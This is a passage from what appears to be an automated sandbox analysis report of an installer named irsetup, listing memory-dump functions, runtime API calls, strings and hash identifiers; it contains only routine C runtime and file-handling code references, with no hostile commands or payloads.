Instruction ID: 4a9433009a0817146d8213779e3cdba636acc00540cdeb6e6f7f8c89661ab616
Opcode Fuzzy Hash: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
Instruction Fuzzy Hash: A8115E31261B8882EAD79B50E4807E873A0F78DBC8F498125FA1D03791DF34CA5DC701

Function 00000001800207F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 00000001800207FF
GetProcAddress.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 0000000180020814

Strings

CorExitProcess, xrefs: 000000018002080A
mscoree.dll, xrefs: 00000001800207F8

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
Instruction ID: 8eca91b44297037b0ac9d1d6b010f20b8df3b1a68d07564286341e8c3e27f513
Opcode Fuzzy Hash: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
Instruction Fuzzy Hash: D7E01234B11B0851FE9B5F91A8E43A51390AB4C780F499829985E06391DF68878D8394

Function 0000000180028C50 Relevance: 6.4, APIs: 5, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

Part of subcall function 000000018002FF88: _errno.LIBCMT ref: 000000018002FFA3

free.LIBCMT ref: 0000000180028D99
free.LIBCMT ref: 0000000180028DB5

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

free.LIBCMT ref: 0000000180028DCA

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180028DE9
free.LIBCMT ref: 0000000180028E05

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentSleepTerminateUnwindVirtualmalloc
String ID:
API String ID: 1498969394-0
Opcode ID: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
Instruction ID: e4a9b29ca778be11defb2c39dc2281dcbbc2f6ed8a753c597f6380265792a982
Opcode Fuzzy Hash: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
Instruction Fuzzy Hash: 1D517236201E4886EBA39F25E8403DD3355F788BD8F598026FE8D47795DE38CA8AC344

Function 0000000180029078 Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800290AA

Part of subcall function 0000000180028E38: _getptd.LIBCMT ref: 0000000180028E72

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _getptd
String ID:
API String ID: 3186804695-0
Opcode ID: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
Instruction ID: 8693baa525cc390d4e04389ed9084d09a48d9bf4543c762d9cd6e86b7275e954
Opcode Fuzzy Hash: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
Instruction Fuzzy Hash: 5281B072205B8996EBA6DF65E1847DE73A0F3487C4F508126EB8D43B94DF38D258CB00

Function 0000000180039880 Relevance: 6.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018002D20C: _FF_MSGBANNER.LIBCMT ref: 000000018002D233

_lock.LIBCMT ref: 00000001800398BE
_lock.LIBCMT ref: 0000000180039917
EnterCriticalSection.KERNEL32 ref: 0000000180039956
LeaveCriticalSection.KERNEL32 ref: 0000000180039966

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CriticalSection_lock$EnterLeave
String ID:
API String ID: 2641352136-0
Opcode ID: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
Instruction ID: f39b5f0a46982969517bee665c5b07b8d69fc09acf0904b0d854b37e53922783
Opcode Fuzzy Hash: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
Instruction Fuzzy Hash: 9D510932201B8886EB93CF55E4403AA7791F7987E8F46C216FA5A067E5CF78C619C701

Function 00000001800295A4 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800295CB

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_getptd.LIBCMT ref: 00000001800295F1
_lock.LIBCMT ref: 000000018002962A
_lock.LIBCMT ref: 00000001800296BD

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _lock$DecodePointer_errno_getptd
String ID:
API String ID: 4201827665-0
Opcode ID: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
Instruction ID: 460a503547ebc5d843fb0f47162114160bb622de7595eaa0c997af710718bdb1
Opcode Fuzzy Hash: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
Instruction Fuzzy Hash: D151AC31602A8886F7D7EB25E884BEA2391FB4D7C8F11C525FE5A43792DE78C6498704

Function 000000018002C178 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

FlsFree.KERNEL32(?,?,?,?,0000000180029F37), ref: 000000018002C187
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1A6
free.LIBCMT ref: 000000018002D1AF
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1CF

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CriticalDeleteSection$Freefree
String ID:
API String ID: 1250194111-0
Opcode ID: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
Instruction ID: 70892d1e86e0fe61b579319fcbecef8552250517042c71bfe73d972997a8cc6e
Opcode Fuzzy Hash: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
Instruction Fuzzy Hash: 51119E31605A4CD6FBA78B11E9503A97360E70DBE4F588212FA5502B95CF68CAA9C701

Function 000000018001E96C Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001E981

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_flush.LIBCMT ref: 000000018001E9AA
_freebuf.LIBCMT ref: 000000018001E9B4

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errno_flush_freebuf
String ID:
API String ID: 1889905870-0
Opcode ID: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
Instruction ID: 21c6b32f25e86580c02bfc281b2be964b159bf8c721c44a871fe3adfba9ac30f
Opcode Fuzzy Hash: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
Instruction Fuzzy Hash: 6801D432614A8842FFE7EA7598123FD12516B9E7E8F29C322BA15871D2CE38C6088301

Function 000000018003972C Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180039735
_errno.LIBCMT ref: 000000018003973D

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
Instruction ID: 222b8468457cde4f875127d20ef24c91f9358582f200ea179a318cfe432f40bb
Opcode Fuzzy Hash: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
Instruction Fuzzy Hash: 54012B72625A8C41FB975FA9C8513FD275197997E5F92C302FA2E063E2CF3C42088701

Function 0000000180028434 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 00000001800285BC
_errno.LIBCMT ref: 00000001800285F6

Strings

#, xrefs: 0000000180028554

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: #
API String ID: 3432092939-1885708031
Opcode ID: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
Instruction ID: a15908a98ec50fe91217ef7d26e318360d1aa3a5f1900967077516d825dfa4f5
Opcode Fuzzy Hash: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
Instruction Fuzzy Hash: B5518236206BD885E7A38F15E4403EEBBA0F789B94F548111EB8953B55CE39C949DB01

Function 00000001800265D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 0000000180026609
_errno.LIBCMT ref: 0000000180026707

Strings

-, xrefs: 00000001800266D9

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: -
API String ID: 3432092939-2547889144
Opcode ID: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
Instruction ID: 18eb19642d1af780b867c0ab745fc5cb88b23faebf2bc774daddc210fbea8dfb
Opcode Fuzzy Hash: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
Instruction Fuzzy Hash: 5941D672904B8881E7A38B25E4543EA77A0F75ABD5F15C222FB9807BE4CF38C659C700

Function 000000018001EA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_getbuf.LIBCMT ref: 000000018001EB44

Part of subcall function 000000018002BAAC: _errno.LIBCMT ref: 000000018002BAB5

_errno.LIBCMT ref: 000000018001EAF5

Strings

@, xrefs: 000000018001EB61

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getbuf
String ID: @
API String ID: 606515832-2766056989
Opcode ID: 9403ab3ef98fcd551828b2de61521df5847ccb3f5e9c5ac512d620e411e02bf9
Instruction ID: 3d19db322e9b86e5fe25d9977a452369542916dbcc5a558c71ed9a950448e357
Opcode Fuzzy Hash: 9403ab3ef98fcd551828b2de61521df5847ccb3f5e9c5ac512d620e411e02bf9
Instruction Fuzzy Hash: 8A31EA72604ECC41EBE78F28D4953AD2691A75ABECF58C206FE1A062D5CF78CA59C341

Function 000000018001EEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001EF10

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_errno.LIBCMT ref: 000000018001EFBA

Strings

@, xrefs: 000000018001EF3D

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$DecodePointer
String ID: @
API String ID: 2310398763-2766056989
Opcode ID: 74ba7703ef3d89e0c7b0560970d3bf7eb981cfd676f65553a41b505a14b5294c
Instruction ID: a84850765988291fd4f17f9da1824d97baa36799c8467e6cf5b96115ea6561ae
Opcode Fuzzy Hash: 74ba7703ef3d89e0c7b0560970d3bf7eb981cfd676f65553a41b505a14b5294c
Instruction Fuzzy Hash: A9310D32600E8D41EBE7DB3998513FD225167897E4F64C32BFE29466D5DF38C61A8301

Function 0000000180039178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018003918E
_errno.LIBCMT ref: 00000001800391D0

Strings

1, xrefs: 0000000180039220

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID: 1
API String ID: 2918714741-2212294583
Opcode ID: 46d2f9773c3c74fcab1c881f3f148963bc3bc4c9c84ae9032c3a66bf402617d8
Instruction ID: 9d0cc6883bf45aa8de4f31950166c67cd5585dda591aea29b30f3553ffaa3b73
Opcode Fuzzy Hash: 46d2f9773c3c74fcab1c881f3f148963bc3bc4c9c84ae9032c3a66bf402617d8
Instruction Fuzzy Hash: 7E21F83261AAC855FBE79B68C4143EF7B91A74E7C0F5AC411B745062C3DE6D8B08C711

Function 000000018000DD40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018000DD8C

Strings

__close, xrefs: 000000018000DE07
file is already closed, xrefs: 000000018000DD64

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID: __close$file is already closed
API String ID: 2918714741-3567927775
Opcode ID: dd34c21ef1cb93705251fd7510c9b52bb08e8fdba4894b81b0dbd31642b777f2
Instruction ID: 5212b77ea421d767a63583ebfe1c0c3f01a91f7c6577d08a4d905ae789f47158
Opcode Fuzzy Hash: dd34c21ef1cb93705251fd7510c9b52bb08e8fdba4894b81b0dbd31642b777f2
Instruction Fuzzy Hash: 2F21C531710A8981FAD6EB66A8013DE7341ABCDBD0F58D132BD1A0B3DADE38C6498740

Function 000000018000D4E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018000D56A

Strings

FILE*, xrefs: 000000018000D52C
%s: %s, xrefs: 000000018000D589

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID: %s: %s$FILE*
API String ID: 2918714741-2400621551
Opcode ID: 910dafadb65821362d6d548511ac076f068beffe28083bae02cf5223914a01d8
Instruction ID: accc405d7271c740622e845d5831acabee4d184a8a30b13b1a844166888f6864
Opcode Fuzzy Hash: 910dafadb65821362d6d548511ac076f068beffe28083bae02cf5223914a01d8
Instruction Fuzzy Hash: DF218131315B8885FA92EB22A8517DA3364AB8DBC0F44C122BD490B797DF38C60E8741

Function 000000018000D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180020C38: _errno.LIBCMT ref: 0000000180020C78

_errno.LIBCMT ref: 000000018000D66A

Strings

FILE*, xrefs: 000000018000D62C
%s: %s, xrefs: 000000018000D689

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID: %s: %s$FILE*
API String ID: 2918714741-2400621551
Opcode ID: 7cf67dcd794677371bcfb2b39bc427531bcb3aaca4ae874a0c31b5ea197deb1a
Instruction ID: 19c1d6e09956a2abd958a59b08d8592876308c72a2221f84d39e5e547afbcd58
Opcode Fuzzy Hash: 7cf67dcd794677371bcfb2b39bc427531bcb3aaca4ae874a0c31b5ea197deb1a
Instruction Fuzzy Hash: 7E218E31315B8885FAD2EB22A4517DA3354AB8ABC0F54C122BE490BB97DF39C60E8740

Function 000000018000E120 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018000E1A4

Strings

attempt to use a closed file, xrefs: 000000018000E14C
FILE*, xrefs: 000000018000E12F

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID: FILE*$attempt to use a closed file
API String ID: 2918714741-999929173
Opcode ID: 5259589b0467af2d185911a9903d098e28697e51fc9d53b68a05c68ec9195d46
Instruction ID: 7b7e7c093c51c25460a7f581b25aced5a49adda45f43c14ec949f41a6986b770
Opcode Fuzzy Hash: 5259589b0467af2d185911a9903d098e28697e51fc9d53b68a05c68ec9195d46
Instruction Fuzzy Hash: 59218471714A5881FB82EB52E4913EE7355E78DBC4F44C021FA0917B96DF38C74A8740

Function 000000018000E210 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

fflush.LIBCMT ref: 000000018000E25E
_errno.LIBCMT ref: 000000018000E26A

Strings

standard %s file is closed, xrefs: 000000018000E24C

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errnofflush
String ID: standard %s file is closed
API String ID: 748766958-758085179
Opcode ID: 29d758137d5008e39d38fda35e1e1e78585e31ee197041ab0c03b638ba806f95
Instruction ID: 13b2d2a399c7b8f71d922a7862b0f845e15a3ca73828d8b66483604ea9ce396f
Opcode Fuzzy Hash: 29d758137d5008e39d38fda35e1e1e78585e31ee197041ab0c03b638ba806f95
Instruction Fuzzy Hash: 4311C631704A8881FA86EB66A5913EE7715AB8EBC0F08C121FE591B7D7DF6CC6498340

Function 000000018000D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

tmpfile.LIBCMT ref: 000000018000D722
_errno.LIBCMT ref: 000000018000D72F

Strings

FILE*, xrefs: 000000018000D6F7

Memory Dump Source

Source File: 00000002.00000002.4546444804.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4546389444.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546536561.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546598306.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4546651964.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errnotmpfile
String ID: FILE*
API String ID: 2695038999-3635956593
Opcode ID: ce56237579ba7b5fc4d47723feea7fa221da64eeb4222d57e2e52a3656d6d57a
